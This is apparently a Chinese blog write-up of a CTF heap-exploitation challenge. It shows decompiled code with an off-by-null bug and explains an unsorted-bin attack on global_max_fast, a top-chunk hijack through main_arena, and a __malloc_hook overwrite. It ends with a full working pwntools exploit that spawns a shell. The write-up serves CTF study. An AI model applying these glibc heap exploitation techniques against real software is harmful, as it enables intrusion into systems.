<
fastbinattack的一种花式玩法
>
上一篇

强网杯opm
下一篇

一道很简单的pwn

offbynull + unsortedbinattack + fastbin attack + main_arena attack

这个题目就是我一星期没睡好觉的罪魁祸首 在七夕节这天我终于弄懂了!!!!!!!

    while ( 1 )
      {
        choices();
        __isoc99_scanf("%d", &v3);
        switch ( v3 )
        {
          case 2:
            delete();
            break;
          case 3:
            show();
            break;
          case 1:
            add();
            break;
          default:
            puts("invalid~");
            break;
        }

标准的选单题目,但是没有edit函数 做的很绝,delete的时候都清空了,add时先把内存区域清零,而且只能申请0x80以上大小的堆块

    unsigned __int64 add()
    {
      int v1; // [rsp+0h] [rbp-10h]
      int i; // [rsp+4h] [rbp-Ch]
      unsigned __int64 v3; // [rsp+8h] [rbp-8h]
    
      v3 = __readfsqword(0x28u);
      for ( i = 0; i <= 15 && heap_list[i]; ++i )
        ;
      if ( i <= 15 )
      {
        printf("length: ");
        __isoc99_scanf("%d", &v1);
        if ( v1 > 127 && v1 <= 0x10000 )
        {
          heap_list[i] = malloc(v1);
          if ( !heap_list[i] )
          {
            puts("malloc failed.");
            exit(-1);
          }
          memset(heap_list[i], 0, v1);
          puts("your note:");
          suspect((__int64)heap_list[i], v1);
          puts("done.");
        }
        else
        {
          puts("invalid size");
        }
      }
      else
      {
        puts("you can't add anymore.");
      }
      return __readfsqword(0x28u) ^ v3;
    }

——————————————————————————————————————————————————————

    unsigned __int64 sub_D73()
    {
      int v1; // [rsp+4h] [rbp-Ch]
      unsigned __int64 v2; // [rsp+8h] [rbp-8h]
    
      v2 = __readfsqword(0x28u);
      printf("index: ");
      __isoc99_scanf("%d", &v1);
      if ( v1 >= 0 && v1 <= 15 && heap_list[v1] )
      {
        free(heap_list[v1]);
        heap_list[v1] = 0LL;
        puts("done.");
      }
      else
      {
        puts("invalid index.");
      }
      return __readfsqword(0x28u) ^ v2;
    }

主要漏洞点就一个

    unsigned __int64 __fastcall suspect(__int64 a1, unsigned int a2)
    {
      char buf; // [rsp+13h] [rbp-Dh]
      unsigned int i; // [rsp+14h] [rbp-Ch]
      unsigned __int64 v5; // [rsp+18h] [rbp-8h]
    
      v5 = __readfsqword(0x28u);
      for ( i = 0; i < a2; ++i )
      {
        buf = 0;
        if ( read(0, &buf, 1uLL) < 0 )
        {
          puts("Read error.");
          exit(-2);
        }
        if ( buf == 10 )
        {
          *(_BYTE *)(i + a1) = 0;
          return __readfsqword(0x28u) ^ v5;
        }
        *(_BYTE *)(a1 + i) = buf;
      }
      *(_BYTE *)(i + a1) = 0;                       // off by null
      return __readfsqword(0x28u) ^ v5;
    }

这里有一个offbynull漏洞 常规的方法肯定是用不了了,主体的思路就是leak地址,改写maxfast值,而后劫持topchunk指针,改写mallochook,getshell 1.leak 主要的就是利用offbynull的chunkshrink,利用unsortedbin分割产生的fd,bk指针,使其落到其中一个我们可控的堆块内,打印即可 2.改写maxfast unsorted binattack:把bk改成global_max_fast-0x10,然后重新申请,maxfast的值改成一个很大的数字,这样以后的堆块就全是fastbin范围内的了 以上都是常规操作 3.劫持topchunk 首先需要知道main_arena的结构 从main_arena起始地址开始,第一个地址内存的是flag标志位,而后的七个地址内存的是从0x20–0x80大小的fastbin指针,后面的几个地址不知道干嘛的,但是main+0x58这里存储的是topchunk指针,unsortedbin指向它是因为把它当作头部处理 当我们改写fastbin大小的时候,大于0x80的fastbin会顺序的存储在后面的地址内,这样,我们申请一个大小为c0的堆块(算上头部大小),正好就落在了topchunk的地址内,这样我们就劫持了topchunk 4.修改mallochook 常规的修改mallochook指针的方式是利用fastbinattack,这里由于我们只能申请大于0x80大小的堆块,所以这里采用将topchunk修改为mallochook-0x10,而后从topchunk里申请,值得注意的一点是,由于之前的操作原本的堆结构以及指针已经面目全非,而在我们申请一个堆块的时候检查顺序是遍历所有bin,而后才在topchunk里寻找,这里我们需要维护unsortedbin的两个指针,使其指向自己,原理与劫持topchunk类似,在此不再赘述 具体细节参考exp,注释写的还算详细 exp:

from pwn import *
context.log_level = 'debug'
def add(size,note):
    p.sendlineafter(">> ","1")
    p.sendlineafter("length: ",str(size))
    p.sendafter("note:",note)

def delete(index):
    p.sendlineafter(">> ","2")
    p.sendlineafter("index: ",str(index))

def show(index):
    p.sendlineafter(">> ","3")
    p.sendlineafter("index: ",str(index))

local=1
libc=ELF('./libc.so.6')
if local:
    p=process('./offbyone2')#,env={'LD_PRELOAD':libc.path})
else:
    p=remote('127.0.0.1',10006)

add(0x88,'A'*0x88)#0
add(0x210,'B'*0x1f0+p64(0x200)+p64(0x21)+'\n')#1
add(0x80,'C'*0x80)#2
add(0x80,'D'*0x80)#3
#gdb.attach(p)
delete(1)
#gdb.attach(p)
delete(0)
#gdb.attach(p)
add(0x88,'A'*0x88)


add(0x100,'B'*0x100)#1
#gdb.attach(p)
add(0x80,'D'*0x80)#4
#gdb.attach(p)

delete(1)
#gdb.attach(p)
delete(2)
#gdb.attach(p)
add(0x100,'B'*0x100)#1
#gdb.attach(p)


show(4)
main_arena=u64(p.recvline(keepends=False).ljust(8,'\0'))-0x58
print hex(main_arena)

libc_base=main_arena-libc.symbols['__malloc_hook']-0x10
print hex(libc_base)

system=libc_base+libc.symbols['system']
print "system",hex(system)


malloc_hook=libc_base+libc.symbols['__malloc_hook']
one_gadget = libc_base + 0xe9415
#one_gadget=libc_base+0xf02a4
#global_max_fast=libc_base+0x3c67f8
global_max_fast = main_arena +0x23e0
delete(1)

#gdb.attach(p)
#re arrange the heap structure
add(0x2a0,'a'*0x108+p64(0xc1)+'a'*0xb8+p64(0x91)+'a'*0x88+p64(0x51)+'\n')#1
#split into 3 chunks

delete(1)
#gdb.attach(p)
#add 1 to the unsortedbin
add(0x300,'a\n')#1
#gdb.attach(p)
#now 1 in smallbins
#new chunk from top chunk
#main purpose is to add 1 to smallbin
#because modify maxfast via unsortedbin attack will make
#unsorted bin cant be used any more
delete(4)
#gdb.attach(p)
#add 4 to th unsortedbin

#unsortedbin attack, make fast max = unsorted bin's addr 
add(0x2a0,'a'*0x108+p64(0xc0)+p64(global_max_fast-0x10)+p64(global_max_fast-0x10)+'a'*0xa0+p64(0xc0)+p64(0x91)+'\n')#2
#gdb.attach(p)
add(0xb0,'a\n')#4
#gdb.attach(p)
#raw_input()
#now that since 4 is realloced,
#so that the fake fd,bk now inseted into unsortedbin
#their fd,bk now is unsortedbin's addr
#it is excatly where global_max_fast lies in
#p &global_max_fast
#its a very large number
delete(4)
#hijack topchunk
#insert into fastbin
delete(2)

#insert  the second large chunk,
#which contains our fake chunk structure
#main purpose is to re edit its content
add(0x2a0,'a'*0x108+p64(0xc1)+p64(malloc_hook-0x10)+'\n')#2
#make the fake fd ptr point to malloc_hook-0x10
#global_max insert into smallbin

add(0xb0,'a\n')#4
#now top chunk is mlh4

#now malloc_hook-0x10 inserted into fastbin
delete(2)
#re edit
add(0x2a0,'a'*0x108+p64(0xf1)+'a'*0xe8+p64(0x61)+'\n')#2
# enlarge the fake chunk
delete(4)
#change 4 size to f0
#f->4->mlh-0x10
delete(2)
#reedit
add(0x2a0,'a'*0x108+p64(0xf1)+p64(main_arena+0x58)+'a'*0xe0+p64(0x61)+'\n')#2
#fake fd point to unsorted bin
add(0xe0,'a\n')#4
#f->mlh-10
delete(2)
#reedit
add(0x2a0,'a'*0x108+p64(0xe1)+p64(main_arena+0x58)+'a'*0xd0+p64(0x71)+'\n')#2
#shrink 4's size, 
add(0xd0,'ZZZZZZZZ\n')#5
#4 is used

add(0x80,p64(one_gadget)+'\n')

gdb.attach(p)
delete(4)
#gdb.attach(p)
delete(5)
#gdb.attach(p)
raw_input()
p.interactive()
Top
Foot